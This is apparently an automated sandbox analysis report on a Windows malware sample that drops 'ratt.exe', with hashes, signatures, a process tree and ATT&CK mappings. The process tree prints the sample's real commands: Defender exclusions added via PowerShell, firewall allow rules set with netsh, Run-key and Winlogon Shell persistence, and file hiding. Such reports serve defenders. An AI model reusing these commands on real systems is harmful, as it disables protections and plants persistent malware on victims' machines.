Analysis
-
max time kernel
142s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20230703-en -
resource tags
arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system -
submitted
13/08/2023, 10:48
Static task
static1
Behavioral task
behavioral1
Sample
dcbbadb9460751f4a7684af8b8bb8c78f3327b066445100d277af5c01f184f4eexe_JC.exe
Resource
win7-20230712-en
Behavioral task
behavioral2
Sample
dcbbadb9460751f4a7684af8b8bb8c78f3327b066445100d277af5c01f184f4eexe_JC.exe
Resource
win10v2004-20230703-en
General
-
Target
dcbbadb9460751f4a7684af8b8bb8c78f3327b066445100d277af5c01f184f4eexe_JC.exe
-
Size
1.4MB
-
MD5
d033f99723109ae7a00f9861bfea7e8b
-
SHA1
b6dbb1d6654ec62fa1925f8ca3ea9b73bfbe5746
-
SHA256
dcbbadb9460751f4a7684af8b8bb8c78f3327b066445100d277af5c01f184f4e
-
SHA512
13fd16b656d7dcd2f8027b082084fb4d0bb7f5f924c1db8bd027664a2cce26f20f2b41a6c2b5924a78a2641f1cacfa67e7998797b2b57836d1a1e5cc517eb91e
-
SSDEEP
24576:U2G/nvxW3Ww0tRp8GiXTBhq7yRDvHcUcjUvy0lr3Tl6icOB/UWoT:UbA30H4zF0UMSAicOB/UWk
Malware Config
Signatures
-
Modifies Windows Firewall 1 TTPs 2 IoCs
pid Process 3080 netsh.exe 976 netsh.exe -
ACProtect 1.3x - 1.4x DLL software 2 IoCs
Detects file using ACProtect software.
resource yara_rule behavioral2/files/0x000800000002320a-231.dat acprotect behavioral2/files/0x000800000002320a-232.dat acprotect -
Executes dropped EXE 3 IoCs
pid Process 2676 7z.exe 3352 ratt.exe 3712 ratt.exe -
Loads dropped DLL 1 IoCs
pid Process 2676 7z.exe -
resource yara_rule behavioral2/memory/2676-229-0x0000000000400000-0x0000000000432000-memory.dmp upx behavioral2/files/0x0007000000023219-230.dat upx behavioral2/files/0x0007000000023219-228.dat upx behavioral2/files/0x000800000002320a-231.dat upx behavioral2/files/0x000800000002320a-232.dat upx behavioral2/memory/2676-233-0x0000000010000000-0x00000000100E2000-memory.dmp upx behavioral2/memory/2676-237-0x0000000000400000-0x0000000000432000-memory.dmp upx -
Unexpected DNS network traffic destination 3 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
description ioc Destination IP 208.67.222.222 Destination IP 208.67.222.222 Destination IP 208.67.222.222 -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ratt = "C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\ratt.exe" reg.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs ping.exe 1 TTPs 2 IoCs
pid Process 4412 PING.EXE 928 PING.EXE -
Suspicious behavior: EnumeratesProcesses 16 IoCs
pid Process 1868 powershell.exe 1868 powershell.exe 4392 powershell.exe 4392 powershell.exe 2388 powershell.exe 2388 powershell.exe 2276 powershell.exe 2276 powershell.exe 2696 powershell.exe 2696 powershell.exe 2580 powershell.exe 2580 powershell.exe 3352 ratt.exe 3352 ratt.exe 3712 ratt.exe 3712 ratt.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeIncreaseQuotaPrivilege 3696 WMIC.exe Token: SeSecurityPrivilege 3696 WMIC.exe Token: SeTakeOwnershipPrivilege 3696 WMIC.exe Token: SeLoadDriverPrivilege 3696 WMIC.exe Token: SeSystemProfilePrivilege 3696 WMIC.exe Token: SeSystemtimePrivilege 3696 WMIC.exe Token: SeProfSingleProcessPrivilege 3696 WMIC.exe Token: SeIncBasePriorityPrivilege 3696 WMIC.exe Token: SeCreatePagefilePrivilege 3696 WMIC.exe Token: SeBackupPrivilege 3696 WMIC.exe Token: SeRestorePrivilege 3696 WMIC.exe Token: SeShutdownPrivilege 3696 WMIC.exe Token: SeDebugPrivilege 3696 WMIC.exe Token: SeSystemEnvironmentPrivilege 3696 WMIC.exe Token: SeRemoteShutdownPrivilege 3696 WMIC.exe Token: SeUndockPrivilege 3696 WMIC.exe Token: SeManageVolumePrivilege 3696 WMIC.exe Token: 33 3696 WMIC.exe Token: 34 3696 WMIC.exe Token: 35 3696 WMIC.exe Token: 36 3696 WMIC.exe Token: SeIncreaseQuotaPrivilege 3696 WMIC.exe Token: SeSecurityPrivilege 3696 WMIC.exe Token: SeTakeOwnershipPrivilege 3696 WMIC.exe Token: SeLoadDriverPrivilege 3696 WMIC.exe Token: SeSystemProfilePrivilege 3696 WMIC.exe Token: SeSystemtimePrivilege 3696 WMIC.exe Token: SeProfSingleProcessPrivilege 3696 WMIC.exe Token: SeIncBasePriorityPrivilege 3696 WMIC.exe Token: SeCreatePagefilePrivilege 3696 WMIC.exe Token: SeBackupPrivilege 3696 WMIC.exe Token: SeRestorePrivilege 3696 WMIC.exe Token: SeShutdownPrivilege 3696 WMIC.exe Token: SeDebugPrivilege 3696 WMIC.exe Token: SeSystemEnvironmentPrivilege 3696 WMIC.exe Token: SeRemoteShutdownPrivilege 3696 WMIC.exe Token: SeUndockPrivilege 3696 WMIC.exe Token: SeManageVolumePrivilege 3696 WMIC.exe Token: 33 3696 WMIC.exe Token: 34 3696 WMIC.exe Token: 35 3696 WMIC.exe Token: 36 3696 WMIC.exe Token: SeDebugPrivilege 1868 powershell.exe Token: SeDebugPrivilege 4392 powershell.exe Token: SeDebugPrivilege 2388 powershell.exe Token: SeDebugPrivilege 2276 powershell.exe Token: SeDebugPrivilege 2696 powershell.exe Token: SeDebugPrivilege 2580 powershell.exe Token: SeIncreaseQuotaPrivilege 752 WMIC.exe Token: SeSecurityPrivilege 752 WMIC.exe Token: SeTakeOwnershipPrivilege 752 WMIC.exe Token: SeLoadDriverPrivilege 752 WMIC.exe Token: SeSystemProfilePrivilege 752 WMIC.exe Token: SeSystemtimePrivilege 752 WMIC.exe Token: SeProfSingleProcessPrivilege 752 WMIC.exe Token: SeIncBasePriorityPrivilege 752 WMIC.exe Token: SeCreatePagefilePrivilege 752 WMIC.exe Token: SeBackupPrivilege 752 WMIC.exe Token: SeRestorePrivilege 752 WMIC.exe Token: SeShutdownPrivilege 752 WMIC.exe Token: SeDebugPrivilege 752 WMIC.exe Token: SeSystemEnvironmentPrivilege 752 WMIC.exe Token: SeRemoteShutdownPrivilege 752 WMIC.exe Token: SeUndockPrivilege 752 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2360 wrote to memory of 4252 2360 dcbbadb9460751f4a7684af8b8bb8c78f3327b066445100d277af5c01f184f4eexe_JC.exe 81 PID 2360 wrote to memory of 4252 2360 dcbbadb9460751f4a7684af8b8bb8c78f3327b066445100d277af5c01f184f4eexe_JC.exe 81 PID 2360 wrote to memory of 4252 2360 dcbbadb9460751f4a7684af8b8bb8c78f3327b066445100d277af5c01f184f4eexe_JC.exe 81 PID 4252 wrote to memory of 1884 4252 cmd.exe 85 PID 4252 wrote to memory of 1884 4252 cmd.exe 85 PID 4252 wrote to memory of 1884 4252 cmd.exe 85 PID 1884 wrote to memory of 4504 1884 cmd.exe 86 PID 1884 wrote to memory of 4504 1884 cmd.exe 86 PID 1884 wrote to memory of 4504 1884 cmd.exe 86 PID 4252 wrote to memory of 4952 4252 cmd.exe 87 PID 4252 wrote to memory of 4952 4252 cmd.exe 87 PID 4252 wrote to memory of 4952 4252 cmd.exe 87 PID 4952 wrote to memory of 3696 4952 cmd.exe 88 PID 4952 wrote to memory of 3696 4952 cmd.exe 88 PID 4952 wrote to memory of 3696 4952 cmd.exe 88 PID 4252 wrote to memory of 1868 4252 cmd.exe 90 PID 4252 wrote to memory of 1868 4252 cmd.exe 90 PID 4252 wrote to memory of 1868 4252 cmd.exe 90 PID 4252 wrote to memory of 4392 4252 cmd.exe 94 PID 4252 wrote to memory of 4392 4252 cmd.exe 94 PID 4252 wrote to memory of 4392 4252 cmd.exe 94 PID 4252 wrote to memory of 2388 4252 cmd.exe 96 PID 4252 wrote to memory of 2388 4252 cmd.exe 96 PID 4252 wrote to memory of 2388 4252 cmd.exe 96 PID 4252 wrote to memory of 2276 4252 cmd.exe 97 PID 4252 wrote to memory of 2276 4252 cmd.exe 97 PID 4252 wrote to memory of 2276 4252 cmd.exe 97 PID 4252 wrote to memory of 2696 4252 cmd.exe 100 PID 4252 wrote to memory of 2696 4252 cmd.exe 100 PID 4252 wrote to memory of 2696 4252 cmd.exe 100 PID 4252 wrote to memory of 2676 4252 cmd.exe 101 PID 4252 wrote to memory of 2676 4252 cmd.exe 101 PID 4252 wrote to memory of 2676 4252 cmd.exe 101 PID 4252 wrote to memory of 2580 4252 cmd.exe 103 PID 4252 wrote to memory of 2580 4252 cmd.exe 103 PID 4252 wrote to memory of 2580 4252 cmd.exe 103 PID 2580 wrote to memory of 3080 2580 powershell.exe 105 PID 2580 wrote to memory of 3080 2580 powershell.exe 105 PID 2580 wrote to memory of 3080 2580 powershell.exe 105 PID 2580 wrote to memory of 976 2580 powershell.exe 106 PID 2580 wrote to memory of 976 2580 powershell.exe 106 PID 2580 wrote to memory of 976 2580 powershell.exe 106 PID 2580 wrote to memory of 4660 2580 powershell.exe 107 PID 2580 wrote to memory of 4660 2580 powershell.exe 107 PID 2580 wrote to memory of 4660 2580 powershell.exe 107 PID 4660 wrote to memory of 752 4660 cmd.exe 108 PID 4660 wrote to memory of 752 4660 cmd.exe 108 PID 4660 wrote to memory of 752 4660 cmd.exe 108 PID 2580 wrote to memory of 2844 2580 powershell.exe 109 PID 2580 wrote to memory of 2844 2580 powershell.exe 109 PID 2580 wrote to memory of 2844 2580 powershell.exe 109 PID 2844 wrote to memory of 3212 2844 cmd.exe 110 PID 2844 wrote to memory of 3212 2844 cmd.exe 110 PID 2844 wrote to memory of 3212 2844 cmd.exe 110 PID 2580 wrote to memory of 3352 2580 powershell.exe 111 PID 2580 wrote to memory of 3352 2580 powershell.exe 111 PID 2580 wrote to memory of 3352 2580 powershell.exe 111 PID 2580 wrote to memory of 2036 2580 powershell.exe 112 PID 2580 wrote to memory of 2036 2580 powershell.exe 112 PID 2580 wrote to memory of 2036 2580 powershell.exe 112 PID 4252 wrote to memory of 4180 4252 cmd.exe 114 PID 4252 wrote to memory of 4180 4252 cmd.exe 114 PID 4252 wrote to memory of 4180 4252 cmd.exe 114 PID 4252 wrote to memory of 3712 4252 cmd.exe 113 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 2036 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\dcbbadb9460751f4a7684af8b8bb8c78f3327b066445100d277af5c01f184f4eexe_JC.exe"C:\Users\Admin\AppData\Local\Temp\dcbbadb9460751f4a7684af8b8bb8c78f3327b066445100d277af5c01f184f4eexe_JC.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2360 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ratt.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:4252 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c nslookup myip.opendns.com. resolver1.opendns.com3⤵
- Suspicious use of WriteProcessMemory
PID:1884 -
C:\Windows\SysWOW64\nslookup.exenslookup myip.opendns.com. resolver1.opendns.com4⤵PID:4504
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c wmic ComputerSystem get Domain3⤵
- Suspicious use of WriteProcessMemory
PID:4952 -
C:\Windows\SysWOW64\Wbem\WMIC.exewmic ComputerSystem get Domain4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3696
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowershell -Command 'Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\ratt.exe"'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1868
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowershell -Command 'Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\"'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4392
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowershell -Command 'Add-MpPreference -ExclusionPath "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ratt.exe"'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2388
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowershell -Command 'Add-MpPreference -ExclusionPath "$Env:SystemDrive\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2276
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowershell -Command 'Add-MpPreference -ExclusionProcess "C:\Users\Admin\AppData\Local\Temp\ratt.exe"'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2696
-
-
C:\Users\Admin\AppData\Local\Temp\7z.exe7z.exe x -o"C:\Users\Admin\AppData\Local\Temp" -y ratt.7z3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2676
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -executionpolicy RemoteSigned -WindowStyle Hidden -file Add.ps13⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2580 -
C:\Windows\SysWOW64\netsh.exe"C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=SecuritySystem dir=in action=allow "program=C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe" enable=yes4⤵
- Modifies Windows Firewall
PID:3080
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=SecuritySystem dir=out action=allow "program=C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe" enable=yes4⤵
- Modifies Windows Firewall
PID:976
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:4660 -
C:\Windows\SysWOW64\Wbem\WMIC.exewmic computersystem where name="GBSDSUCH" set AutomaticManagedPagefile=False5⤵
- Suspicious use of AdjustPrivilegeToken
PID:752
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:2844 -
C:\Windows\SysWOW64\Wbem\WMIC.exewmic pagefileset where name="C:\\pagefile.sys" set InitialSize=15000,MaximumSize=200005⤵PID:3212
-
-
-
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3352 -
C:\Windows\SysWOW64\cmd.exe"cmd" /c ping 127.0.0.1 -n 10 > nul && REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\Music\rot.exe,"5⤵PID:1352
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 106⤵
- Runs ping.exe
PID:4412
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd" /c ping 127.0.0.1 -n 14 > nul && copy "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe" "C:\Users\Admin\Music\rot.exe" && ping 127.0.0.1 -n 14 > nul && "C:\Users\Admin\Music\rot.exe"5⤵PID:4052
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 146⤵
- Runs ping.exe
PID:928
-
-
-
-
C:\Windows\SysWOW64\attrib.exe"C:\Windows\system32\attrib.exe" +h "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe"4⤵
- Views/modifies file attributes
PID:2036
-
-
-
C:\Users\Admin\AppData\Local\Temp\ratt.exe"ratt.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3712
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "ratt" /t REG_SZ /d "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ratt.exe" /F3⤵
- Adds Run key to start application
PID:4180
-
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
745.1MB
MD5be788bb3680cf3809d9678ee6f7ba321
SHA1499f01d5f654f83e172004dcc03f99abdd251734
SHA25603a17a2b669f72df082569ea477977d824796da3b6b7a8d0e6f91f2629ef406b
SHA51283c0b885740a57b84b2c909d0d6bb25baaa49d62499773030b59058325f37a5fcf39a1cd59ef9c229ca7289af7250034f6652e449625b67c2d260b285ddb9a8e
-
Filesize
139.8MB
MD5aecd10b110094872fbff2e05d394908a
SHA183d20ce6bf3a399343e13c4acd489522ba20fc48
SHA25634ee99cda8dcf25daa8e162534387f09cac1afe623ccf50bc23284dcd338df83
SHA512b71ec67c7268e43ce39938d30a84e3ef6a50573294bf4c11482d94d1dede44cda4cce5562bca826d114cabf25fe84d9494e0fe893cafafca35e89b0843694782
-
Filesize
1KB
MD533b19d75aa77114216dbc23f43b195e3
SHA136a6c3975e619e0c5232aa4f5b7dc1fec9525535
SHA256b23ced31b855e5a39c94afa1f9d55b023b8c40d4dc62143e0539c6916c12c9d2
SHA512676fa2fd34878b75e5899197fe6826bb5604541aa468804bc9835bd3acabed2e6759878a8f1358955413818a51456816e90f149133828575a416c2a74fc7d821
-
Filesize
11KB
MD57f47597f8c56f9f1817b62e5cb07c6b3
SHA14d579608f2819b6cd69d7cf8fc7c7f871e24cd7b
SHA25649cc22044b69c2d9aa4f394f3d36aba6c4cb84884c247d591958560836143342
SHA512d59b1e35d3631890c6e9634d66fb671e3767b0c6c8b5f75b5b380798aaf32dc4ed0975bc77320fdab37b5578c2a072484201de06966e2d35abed810796f2ef07
-
Filesize
11KB
MD5d8ab5ad7c01a2fad9aff7acf9da569ba
SHA1d65740afaf3f039816bb4e779c78d89ae444b733
SHA256cc50e69d0160d360a22da067899645203dcfebfa1a750a384f756952cae7e06f
SHA512933ad6066e02646529ebf7a418618617fb7289e8f69c4dbc0d4230a5ca586ff0d486ba329293378a5b9e00f5df593f5fccf5c67856a3b03b1e0c744183763d02
-
Filesize
11KB
MD565935cc0478c6ad35a453f32cc1af726
SHA16e03bd26b290c29d452a38226363f097f9809586
SHA256ec5e8308f8936bb0e5c029a224376909547aabd3acdd647dc0860560be1e0dbc
SHA512f1bcc23969145925e669eaf24cb51f3b4c5ef422cb58d5d765acffd22682e65eddf931d569f145a560bd22b7e4bd86b215df761f31daffa932bd8b986f934517
-
Filesize
11KB
MD5e70bdfd2b2201b25fc3302f94fb9ea25
SHA19c885a228a5c4908988e275b89ad3e4ad941c26f
SHA256c80c99ef94b93aea7695a574d6f7390c909e0d09ddfda9cc53e56c7185a087bd
SHA512f0f6a045dd9091afec32e32586b9c34435e19c8cc7e06078d7b58b5df9fa0d126b5e703c2aaf39f9f76a1c3f29366796e8a81488ba6a9b315be1a604835077bb
-
Filesize
11KB
MD5f96349304a8b44a0dc75a33568896c02
SHA197253fb24c1b89a28cb956d28f00fff771ad168f
SHA2569f7f02aac250422dc64ff96c9e67338e6a31f296ef98d67b3701c358f180f8fd
SHA51246bf330f5e49ed6c97a7fa109f327eac9b16ac12536ca900495de188066a311bb7227fcc8fa48d348e5e564fb21c57f5344107c52637b4e2b0c9c3b7b04a4d1a
-
Filesize
328KB
MD515bbbe562f9be3e5dcbb834e635cc231
SHA17c01cf5fa4db2312c5ed2f7b8c41e3e5c346a51a
SHA256ed50ef8e0b6dd83fb0c3f733329d4aa6e5a3beb3491e2ba9d2ae206813508dde
SHA512769287951b8c16f4b10c1b58e82612844babe7b5c10445fe848d713fb5e8321bcbbd9780e9c564cffe35ea4144e8a7e19645291c4eea372fcaa19ae395a97287
-
Filesize
328KB
MD515bbbe562f9be3e5dcbb834e635cc231
SHA17c01cf5fa4db2312c5ed2f7b8c41e3e5c346a51a
SHA256ed50ef8e0b6dd83fb0c3f733329d4aa6e5a3beb3491e2ba9d2ae206813508dde
SHA512769287951b8c16f4b10c1b58e82612844babe7b5c10445fe848d713fb5e8321bcbbd9780e9c564cffe35ea4144e8a7e19645291c4eea372fcaa19ae395a97287
-
Filesize
71KB
MD58ba2e41b330ae9356e62eb63514cf82e
SHA18dc266467a5a0d587ed0181d4344581ef4ff30b2
SHA256ea2ad8d87b79c8eb3952498c7005a195986436cfd7ca7736dbbdda979142daea
SHA5122fdfc2d368c70320b3dac00fef06381ef90a2a82a1f3137109b033d84e5b70185039af6ec918012dc03bc9d046cd8d8aee3247ba0f59d394e78f1f73380f7a1d
-
Filesize
71KB
MD58ba2e41b330ae9356e62eb63514cf82e
SHA18dc266467a5a0d587ed0181d4344581ef4ff30b2
SHA256ea2ad8d87b79c8eb3952498c7005a195986436cfd7ca7736dbbdda979142daea
SHA5122fdfc2d368c70320b3dac00fef06381ef90a2a82a1f3137109b033d84e5b70185039af6ec918012dc03bc9d046cd8d8aee3247ba0f59d394e78f1f73380f7a1d
-
Filesize
1KB
MD50df43097e0f0acd04d9e17fb43d618b9
SHA169b3ade12cb228393a93624e65f41604a17c83b6
SHA256c8e4a63337a25f55f75ad10ab2b420d716bad4b35a2044fd39dcd5936419d873
SHA51201ae71dd2ee040baad6f4b9afcfbaeca2b9f6cc7d60ade5de637238d65c17d74292734666f4ae6b533f6bf1007c46387d8e690d97c3b7a535bcd6f216e70c4fb
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
693KB
MD57de6fdf3629c73bf0c29a96fa23ae055
SHA1dcb37f6d43977601c6460b17387a89b9e4c0609a
SHA256069979bfb2aefe3cac239fe4f2477672eb75b90c9853fb67b2ac1438f2ec44ff
SHA512d1ef2299aacf429572fd6df185009960e601e49126f080fdced26ec407e5db86eaa902e474635464aac146b7de286667a398f2c5e46c4a821dad2579bfb3acf8
-
Filesize
1KB
MD57ea1fec84d76294d9256ae3dca7676b2
SHA11e335451d1cbb6951bc77bf75430f4d983491342
SHA2569a419095c0bafc6b550f3f760c7b4f91ef3a956cfa6403d3750164ecdbe35940
SHA512ab712c45081b3d1c7edd03e67a8db1518a546f3fbf00e99838dfe03a689c4867a6953e6603dcd2be458b2441f4a2b70286fd7d096549cfcf032dd2cd54d68317
-
Filesize
745.1MB
MD5be788bb3680cf3809d9678ee6f7ba321
SHA1499f01d5f654f83e172004dcc03f99abdd251734
SHA25603a17a2b669f72df082569ea477977d824796da3b6b7a8d0e6f91f2629ef406b
SHA51283c0b885740a57b84b2c909d0d6bb25baaa49d62499773030b59058325f37a5fcf39a1cd59ef9c229ca7289af7250034f6652e449625b67c2d260b285ddb9a8e
-
Filesize
76.5MB
MD5297fbdd6436b9790b1e5201324a2acb5
SHA1ac0b0e3df853bde73950d0704b0008c0a5e3093a
SHA25614897e1b43d27fd8fd67ad154a0d0e136aeb8ca0bc66ab18f34d96ba2db553b7
SHA512cd138b4c25bbc8d2036ef6879abd4e020cd39f0373b21d390f3d0763faf519c2c236166aa6bc759a9865270929356bdb487f6cf1b455c7e73bb6516852efe438